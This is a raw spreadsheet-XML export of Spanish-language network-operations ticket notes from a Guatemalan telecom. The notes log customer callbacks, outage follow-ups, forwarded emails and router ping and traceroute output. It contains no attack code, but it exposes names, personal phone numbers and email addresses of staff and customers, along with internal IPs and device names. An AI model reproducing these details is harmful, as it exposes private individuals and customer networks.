ASUNTO: RE: ENLACE AGENCIA EL NARANJO MIXCO REDUNDANTE (DIST. JALAPEÑA) - (192.168.50.169) ISP: CLARO ID: 366300006 TEL: 22047200 DOWN
BUENOS DÍAS ESTIMADO SR. LUNA.
                LAMENTAMOS LOS INCONVENIENTES, PERSONAL A CARGO NOS INDICA QUE NO SE OBSERVA LINK POR LO QUE ES PROBABLE QUE SE TENGA ALGUNA DESCONEXIÓN ENTRE LOS EQUIPOS. .
LOS COMPAÑEROS LLAMARON AL CONTACTO EN SITIO SIN EMBARGO NO SE OBTUVO RESPUESTA, ME INDICAN QUE YA SE ENCUENTRAN LLAMANDO DE NUEVO.
ESPERAMOS COMPARTIR AVANCES A LA BREVEDAD POSIBLE.
SALUDOS.</t>
  </si>
  <si>
    <t>F4577803</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  22857700 PERO NO RESPONDEN, SE INTENTARA LUEGO **
-ID 2001301618
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PR 42157117 NO SE LOGRA LA COMUNICACION, SE INTENTARA LUEGO
-ID 2001378701</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 22857700 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001529200</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 22857700 NO RESPONDE, SE INTENTARA LUGEO
-ID 2001495887 - 2001497269</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 2285 7700 ATIENDEN A PARTIR DE LAS 8:00 HRS
-ID 2001493595</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 22857700 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 2001539848</t>
  </si>
  <si>
    <t>SE LLAMÓ/HABLÓ CON MARIO SOTO/CLIENTE 59221706 ME BRINDA EL TEL DE VÍCTOR CHOJOLÁN/IT CLIENTE 59221706 PARA SEGUIMIENTO, NO CONTESTA. SE ENVÍA CORREO:
ASUNTO: RE: ENLACE DE DATOS GT96 MCDONALD'S CHIQUIMULA CENTRO</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  22857700 PERO NO RESPONDEN, SE INTENTARA LUEGO **
-ID 2001312643
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  22857700 PERO NO RESPONDEN, SE INTENTARA LUEGO
-ID 2001281247</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 2285 7700 NO RESPONDEN OPERADORA INDICA QUE EMPIEZAN A ATENDER A LAS 8:00  AM **
ID 2001266566
**</t>
  </si>
  <si>
    <t>F4577817</t>
  </si>
  <si>
    <t>SE VALIDA CON MIGUEL RODRIGUEZ AL 8126 ID 2001330493 EL ESTADO DE LA FALLA YA QUE NO SE TIENE AL CL PERO PARA BRINDAR EL SEGUIMIENTO Y SI EL ULTIMO COMENTARIO ES PORQUE LO COLOCARAN EN MONITOREO O QUE HAY PENDIENTES CON EL CLIENTE POR EL ESTADO, YA QUE NO SE TIENE CLARIDAD DE LA CRONOLOGÍA O QUE PROCEDE Y COMENTA QUE SEGÚN  VALIDA EL SERVICIO   Y LO VE CAIDO NO TIENE INFORMACION COMO VALIDARON O EN EL HORARIO PROBABLENTE LO ESTABA POR LO QUE SE CAMBIA A WIP Y SE NOTIFICA AL GESTOR   JOSE.OCHOA EL CAMBIO DE ESTADO.</t>
  </si>
  <si>
    <t>NO SE HA TENIDO RESPUESTA DE CLIENTE VÍA CORREO, SE LE PIDE APOYO POR LA MISMA VÍA.
ASUNTO: PRUEBAS DEL SERVICIO COCA COLA FEMSA DE COSTA RICA S.A || CONTR0001286888OC || SD1129158</t>
  </si>
  <si>
    <t>F4577876</t>
  </si>
  <si>
    <t xml:space="preserve">
SE DA FEEDBACK A CL
DE: JAIME JOSUE HERNANDEZ CASTILLO
ENVIADO: JUEVES, 26 DE MAYO DE 2022 15:40
PARA: CLIENTESCORPORATIVOS; GGARCIA@CEFRIC.COM; OSCAR MIGUEL GOMEZ GUEVARA
CC: GRUPO N1; CNOCCA; ANA MARLENE ARDON PEREZ AGUILAR; LITER ARNOLDO FLORES FLORES
ASUNTO: RE: ENLACE ESCUNTLA
ESTIMADO GUSTAVO
   BUENAS TARDES, NUESTRO PERSONAL DE MOMENTO SE ENCUENTRA ENRUTANDO LA RUTA EN LOS RADIOS, YA QUE SE PRESENTO UNA FALLA EN NUESTRA TRANSMISIÓN, AVANCES EN 2 HORAS APROX.
AGRADECEMOS SU ATENCIÓN.
SALUDOS
ENVIADO DESDE CORREO PARA WINDOWS</t>
  </si>
  <si>
    <t>F4577899</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JORGE QUIÑONES 41512784 MENCIONA QUE PERSISTE LA CAIDA, SE LE INDICA QUE A NIVEL DE CLARO EL SERVICIO ESTA OPERATIVO Y ESTABLE
CLIENTE MENCIONA QUE ENVIARA PRUEBAS POR CORREO
-ID 2001283174</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JORGE QUIÑONEZ  41512784 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO PERO SOLICITA RFO
-ID 2001494185</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JORGE QUIÑONEZ AL 4151 2784 INDICA QUE ELLOS NO DAN ACCESO A DATA CENTER QUE LOS PERMISOS SE SOLICITAN A NETWORKS Y QUE NOSOTROS DEBEMOS DE SOLICITARLOS YA QUE ELLOS NO DAN PERMISO INDICA QUE NOSOTROS DEBEMOS DE SABER || SE NOTIFICA A GESTOR**
ID 2001392343
**</t>
  </si>
  <si>
    <t>SE ENVIA CORREO PARA LA ELABORACION DE DICTAMEN
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 27 DE MAYO DE 2022 8:10
PARA: DICTAMENES &lt;DICTAMENES@CLARO.COM.GT&gt;
CC: DICTAMENESCC &lt;DICTAMENESCC@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;; HUGO ALEJANDRO JUAREZ LOPEZ &lt;HUGOA.JUAREZ@CLARO.COM.GT&gt;; ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;; JAIME JOSUE HERNANDEZ CASTILLO &lt;JAIMEJ.HERNANDEZ@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE DICTAMEN || GLOBAL MOBILITY APEX, S.A. || F4577900
BUEN DÍA
SOLICITO DE SU APOYO CON LA ELABORACIÓN DE RFO CON LOS SIGUIENTES DATOS:
EMPRESA 	ID 	TICKET
GLOBAL MOBILITY APEX, S.A.
831900005T - 831900004T
F4577899 - F4577900
QUEDAMOS ATENTOS A SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*</t>
  </si>
  <si>
    <t>PROVEEDOR REALIZA SUS CAMBIOS SE RESTABLECEN LOS SERVICIOS SE LLAMA AL CLIENTE NO RESPONDE SE ENVIA CORREO PARA VALIDACION SE PORCEDE A COLOCAR EN ETAPA PENDIENTE CLIENTE
DE: RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 26 DE MAYO DE 2022 23:28
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; GIOVANNI RODRIGUEZ &lt;GIOVANNIR@APEXGLOBAL.CO&gt;; OMAR ANTONIO CABRERA DE LA ROCA &lt;OMAR.CABRERA@CLARO.COM.GT&gt;; EDGAR ULISES OROZCO ESCOBAR &lt;EUOROZCO@APEXGLOBAL.CO&gt;; RAFAEL BARDALES DUARTE &lt;RBARDALES@APEXGLOBAL.CO&gt;
CC: CLAUDIA PATRICIA GARCIA VALDES &lt;CLAUDIA.GARCIA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;; JOSE DAVID RAMIREZ STAMBUK &lt;JOSEDAV.RAMIREZ@CLARO.COM.GT&gt;; OSCAR DANIEL GIRON REYES &lt;OSCAR.GIRON@CLARO.COM.GT&gt;; WPULUC@KIONETWORKS.COM &lt;WPULUC@KIONETWORKS.COM&gt;; JORGE QUIÑONEZ &lt;JQUINONEZ@APEXGLOBAL.CO&gt;; JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;; JUAN MANUEL CARDONA SALAMA &lt;JUANM.CARDONA@CLARO.COM.GT&gt;; SUPPORTGT@KIONETWORKS.COM &lt;SUPPORTGT@KIONETWORKS.COM&gt;; JOSE MANUEL OCHOA URBINA &lt;JOSEM.OCHOA@CLARO.COM.GT&gt;
ASUNTO: RE: UERGENTE CAIDA ENLACE C-0201900365 - 66
ESTIMADO CLIENTE LE HACEMOS LLEGAR EL SEGUIMIENTO SOBRE EL INCIDENTE QUE AFECTO LOS SERVICIOS
NUEVO ID: 831900004T ¿ TICKET: SD1129171
NUEVO ID: 831900005T ¿ TICKET: SD1129172
YA SE ENCUENTRA SOLVENTADO NOS APOYO PERSONAL DE TELEFONÍA YA QUE ELLOS TUVIERON UN INCIDENTE EN UN EQUIPO EN WASHINGTON EL CUAL AFECTO SUS SERVICIOS EL PRINCIPAL COMO EL REDUNDANTE LOS CUALES YA SE ENCUENTRAN REESTABLECIDOS OPERATIVOS POR NUESTRA PARTE SOLICITAMOS SU APOYO VALIDANDO LA OPERATIVIDAD DE LOS MISMO A ESPERA DE SU RESPUESTA UN GUSTO PODER ATENDERLE.</t>
  </si>
  <si>
    <t xml:space="preserve">POR PARTE DE TELEFONICA ESPAÑA EDUARDO SANTAMARIA  REALIZA REVICION LA CUAL SE VALIDA QUE SE TUVO UNA INCIDENCIA EN WASHINTONG LA CUAL YA SE ENCUANTRA CORREGIDA POR PARTE DE TELEFONICA SE PROCEDE A VALIDAR CON EL CLIENTE.
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
PROBLEMA DE LECUTURA DE DATOS. ASEGURATE DE QUE EL CPE ES DEL MODELO/MARCA INDICADO.
COMMAND FAIL. RETURN CODE -61
COMMAND PARSE ERROR BEFORE 'PER'
CC_GLOBAL_MOBILITY_A~_BK #
POLITICAS DE TRAFICO:
SHOW FIREWALL POLICY
COMMAND FAIL. RETURN CODE 5
CC_GLOBAL_MOBILITY_A~_BK #
POLITICAS DE ANCHO DE BANDA:
SHOW FIREWALL SHAPING-POLICY
COMMAND FAIL. RETURN CODE 5
CC_GLOBAL_MOBILITY_A~_BK #
TABLA ARP DEL ROUTER CPE:
GET SYSTEM  ARP
COMMAND FAIL. RETURN CODE -61
COMMAND PARSE ERROR BEFORE 'ARP'
CC_GLOBAL_MOBILITY_A~_BK #
INTERFACES DEL ROUTER:
SHOW SYSTEM INTERFACE
COMMAND FAIL. RETURN CODE 5
CC_GLOBAL_MOBILITY_A~_BK #
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN GLOBAL_MOBILITY 10.174.184.238
  PING 10.174.184.238: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.174.184.238 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
RUTA IP:
PE: 10.179.28.17
DISPLAY IP ROUTING-TABLE VPN-INSTANCE GLOBAL_MOBILITY 10.174.184.238
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : GLOBAL_MOBILITY
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
 10.174.184.238/32  DIRECT  0    0                 0.0.0.0         VLANIF579			</t>
  </si>
  <si>
    <t>NO HAY INFORMACIÓN DE LA RAZÓN DE EL ESTADO DE LA FALLA, POR TAL RAZÓN SE PASA A WIP, COMPAÑEROS FAVOR INDICAR QUE ES LO PENDIENTES CON EL CLIENTE PARA EL APOYO A CONTACTARLO Y DAR EL SEGUIMIENTO Y NO AFECTARLOS EN CAMBIAR EL ESTADO. SE NOTIFICA VÍA SKYPE AL GESTOR JOSE.OCHOA POR EL CAMBIO Y BRINDAR EL SEGUIMIENTO.</t>
  </si>
  <si>
    <t>SE VALIDA QUE EL CLIENTE YA COMPARTIÓ EL CORREO DESDE LAS 09:20 VALIDANDO NO HAY NADA PENDIENTE POR PARTE DEL CLIENTE PARA ESTAR EN ESTE ESTADO,  POR TAL RAZÓN SE PASA A WIP, COMPAÑEROS FAVOR INDICAR QUE ES LO PENDIENTES CON EL CLIENTE PARA EL APOYO A CONTACTARLO Y DAR EL SEGUIMIENTO Y NO AFECTARLOS EN CAMBIAR EL ESTADO. SE NOTIFICA VÍA SKYPE AL GESTOR JOSE.OCHOA POR EL CAMBIO Y BRINDAR EL SEGUIMIENTO.
DE: JORGE QUIÑONEZ [MAILTO:JQUINONEZ@APEXGLOBAL.CO]
ENVIADO EL: JUEVES, 26 DE MAYO DE 2022 09:20
PARA: OSCAR DANIEL GIRON REYES &lt;OSCAR.GIRON@CLARO.COM.GT&gt;; GIOVANNI RODRIGUEZ &lt;GIOVANNIR@APEXGLOBAL.CO&gt;; EDGAR ULISES OROZCO ESCOBAR &lt;EUOROZCO@APEXGLOBAL.CO&gt;
CC: CLAUDIA PATRICIA GARCIA VALDES &lt;CLAUDIA.GARCIA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ASUNTO: RE: UERGENTE CAIDA ENLACE C-0201900365 - 66
ESTIMADO SEGUIMOS SIN EL SERVICIO
COMPARTO TRAZA</t>
  </si>
  <si>
    <t>F4577900</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA VALIDAR EL FUNCIONAMIENTO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 26 DE MAYO DE 2022 8:59
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; OSCAR DANIEL GIRON REYES &lt;OSCAR.GIRON@CLARO.COM.GT&gt;; JORGE QUIÑONEZ &lt;JQUINONEZ@APEXGLOBAL.CO&gt;
CC: CLAUDIA PATRICIA GARCIA VALDES &lt;CLAUDIA.GARCIA@CLARO.COM.GT&gt;; GIOVANNI RODRIGUEZ &lt;GIOVANNIR@APEXGLOBAL.CO&gt;; EDGAR ULISES OROZCO ESCOBAR &lt;EUOROZCO@APEXGLOBAL.CO&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: UERGENTE CAIDA ENLACE C-0201900365 - 66
BUEN DÍA
    ESTIMADO CLIENTE DANDO SEGUIMIENTO AL CASO SD1129172, SOLICITAMOS DE SU APOYO VALIDANDO COMO OBSERVA EL SERVICIO ACTUALMENTE, YA QUE EL MISMO SE ENCUENTRA OPERATIVO Y ESTABLE, QUEDAMOS ATENTOS A SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*</t>
  </si>
  <si>
    <t>POR PARTE DE TELEFONICA ESPAÑA EDUARDO SANTAMARIA  REALIZA REVICION LA CUAL SE VALIDA QUE SE TUVO UNA INCIDENCIA EN WASHINTONG LA CUAL YA SE ENCUANTRA CORREGIDA POR PARTE DE TELEFONICA SE PROCEDE A VALIDAR CON EL CLIENTE.</t>
  </si>
  <si>
    <t>TICKET PENDIENTE POR ELABORACIÓN DE RFO, LA SOLICITUD SE HIZO HOY VIERNES 27, EN ESPERA DE LAS 48/72 HORAS HÁBILES, SE ESPERA TENERLO EN EL TRANSCURSO DE LA PRÓXIMA SEMANA.
ASUNTO: SOLICITUD DE DICTAMEN || GLOBAL MOBILITY APEX, S.A. || F4577900</t>
  </si>
  <si>
    <t>F4577905</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL CARLOS MACHÓN 2527-9044 INDICA QUE LE LLAMARON DE CLARO Y QUE LE INDICARON QUE SE ESTARIA REALIZANDO VISITA TECNICA YA QUE SE HIBA A REVISAR EL MEDIO INDICA QUE AUN SIGUE TENIENDO INESTABILIDAD QUE SE LE HA CAIDO EL SERVICIO 2 VECES || SE NOTIFICA  A GESTOR **
ID 2001313122
**
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS MACHON AL 50325279044 SOLICITA QUE SE LE VUELVA A LLAMAR A LAS 16:00 HRS NUEVAMENTE PARA CONFIRMAR YA QUE DESEA QUE SE TENGA EN OBSERVACION**
ID 2001376915
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS MACHON AL 50325279044 QUIEN VALIDA SERVICIO Y AUTORIZA CIERRE DE TICKET
2001447689
COLA:
NOMBRE: A: 50325279044
NÚMERO: 50325279044
DURACIÓN: 0:00:50
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 50325279044
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 26/05/2022 16:42:50</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. CARLOS MACHÓN 2527-9044 EXT.: 44444 SE LE INFORMA DE LA VISITA, INFORMA QUE NO ES NECESARIO GESTION DE PERMISOS.</t>
  </si>
  <si>
    <t>F4577915</t>
  </si>
  <si>
    <t>SE LLAMARA A CLIENTE EN HORARIO DE 9:30 SEGUN LO INDICADO. SE VALIDA EN GRAFICAS CAIDAS PERO SON A CAUSA DE LOS REINICIOS APLICADOS POR CLIENTE, SE DESCNOCE SI ROUTER QUEDA INHIBIDO O TEMA LAN.--- PARAMETROS EN RANGO SE VALIDA QUE NO SE TIENE EVENTOS RECIENTES EN RADIOS Y EN SW DE ACCESO.--</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ROLAN OTONIEL 55103867 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001541838</t>
  </si>
  <si>
    <t>POR REINCIDENCIA ES NECESARIO VALIDAR CON CLIENTE &gt;&gt;&gt; ACTUALMENTE NO RESPONDE
ROLAN OTONIEL 55103867
ADICIONAL A ELLO INFORMARLE  CLIENTE QUE SE REALIZO REINICIO A NIVEL LOGICO EN LAS RUTAS DEL ENLACE REDUNDANTE, SE VALIDA DESDE CENTRAL QUE ESTA SIENDO ENTREGADO POR PRINCIPAL ANTERIOMENTE SE ENTREGABA POR REDUNDANCIA--
CC_KIO_NETWORKS_GT_3800#TRACEROUTE VRF PEPSI 10.232.100.1
TYPE ESCAPE SEQUENCE TO ABORT.
TRACING THE ROUTE TO 10.232.100.1
VRF INFO: (VRF IN NAME/ID, VRF OUT NAME/ID)
  1 10.16.80.137 4 MSEC 0 MSEC 0 MSEC
  2 10.72.181.161 8 MSEC 8 MSEC 8 MSEC
  3 10.72.181.164 8 MSEC *  8 MSEC
CC_KIO_NETWORKS_GT_3800#</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ROLAN OTONIEL 55103867 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 2001461327</t>
  </si>
  <si>
    <t>SE HABLO CON CLIENTE SR. ROLAN OTONIEL 55103867 SE LE INFORMA QUE NIVEL DE CLARO ESTA OPERATIVO Y ESTABLE, SE LE INFORMA QUE HAY REGISTROS DE SATURACION DEL ENLACE, CONFIRMA DE ENTERADO, SOLICITA QUE SE ENVIE LA EVIDENCIA A LA COLA DE CORREOS DE ESTE INCIDENRTE, CON LA RECOMENDACION DE CONTRATAR ANCHO DE BANDA ASI DE LA CENTRAL EVALUAN CON EL EJECUTIVO DE CUENTA CUANTO ANCHO DE BANDA NECESITAN.
CC_PEPSI_GT_FRAY_BARTOLOME_DE_LAS_CASAS#SH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77000        62     68000        80         0
* GI0/0.525                     -         -         -         -         -         -         -         -         -
* GIGABITETHERNET0/1            0         0         0         0         0         0         0         0         0
* GIGABITETHERNET0/0/0          0         0         0         0     10000         7     16000         8         0
  GIGABITETHERNET0/0/1          0         0         0         0         0         0         0         0         0
  GIGABITETHERNET0/0/2          0         0         0         0         0         0         0         0         0
  GIGABITETHERNET0/0/3          0         0         0         0         0         0         0         0         0
* LOOPBACK5                     0         0         0         0         0         0         0         0         0
* VLAN1                         0         0         0     27556     14000         7     34000         8         0
NOTE:NO SEPARATE COUNTERS ARE MAINTAINED FOR SUBINTERFACES
     HENCE DETAILS OF SUBINTERFACE ARE NOT SHOWN
CC_PEPSI_GT_FRAY_BARTOLOME_DE_LAS_CASAS#PING 10.72.181.161  RE 3000 DF-BIT
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 3000, 100-BYTE ICMP ECHOS TO 10.72.181.161, TIMEOUT IS 2 SECONDS:
PACKET SENT WITH THE DF BIT SET
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
SUCCESS RATE IS 100 PERCENT (3000/3000), ROUND-TRIP MIN/AVG/MAX = 1/3/28 MS</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ROLAN OTONIEL LIGORRIA 55103867 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001318339</t>
  </si>
  <si>
    <t>F4577933</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE EDGAR TUCHEZ 47938700 ESTA REALIZANDO PRUEBAS DE LLAMADAS, SOLICITA QUE SE LE CONTACTE EN 1 HORA</t>
  </si>
  <si>
    <t>F4577934</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ENRIQUE AL 83801943  SE CONTACTA A CLIENTE SE TRATA DE CONTACTAR A GESTOR PERO NO SE OBTIENE RESPUESTA SE LE NOTIFICA PARA EL SEGUIMIENTO  **
ID 2001291090
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL PR 50557994993 CONTESTA LA SEÑORITA  JESSICA Y SOLICITA QUE SE LE LLAME AL TECNICO ENRIQUE AL 83801943 YA QUE EL ESTA ESPERANDO LA LLAMADA **
ID 2001289743
**</t>
  </si>
  <si>
    <t>F4577959</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GERSON ESTURBA 55135087 MENCIONA QUE NO HAN PRESENTADO NINGUN PROBLEMA POR LO QUE SOLICITA LLAMARA PARA LAS 14:30
-ID 2001334362</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GERSON ESTURBA 55135087 MENCIONA QUE SIGUE PRESENTANDOSE LAS PERDIDAS DE PAQUETES, SE NOTIFICARA A GESTOR
-ID 2001405873</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GERSON ESTURBA AL 55135087 INDICA QUE SIGUE TENIENDO EL MISMO INCONVENIENTE AUN || SE NOTIFICA A GESTOR Y SE DEJA EN LINEA CON CLIENTE**
ID 2001598912
**</t>
  </si>
  <si>
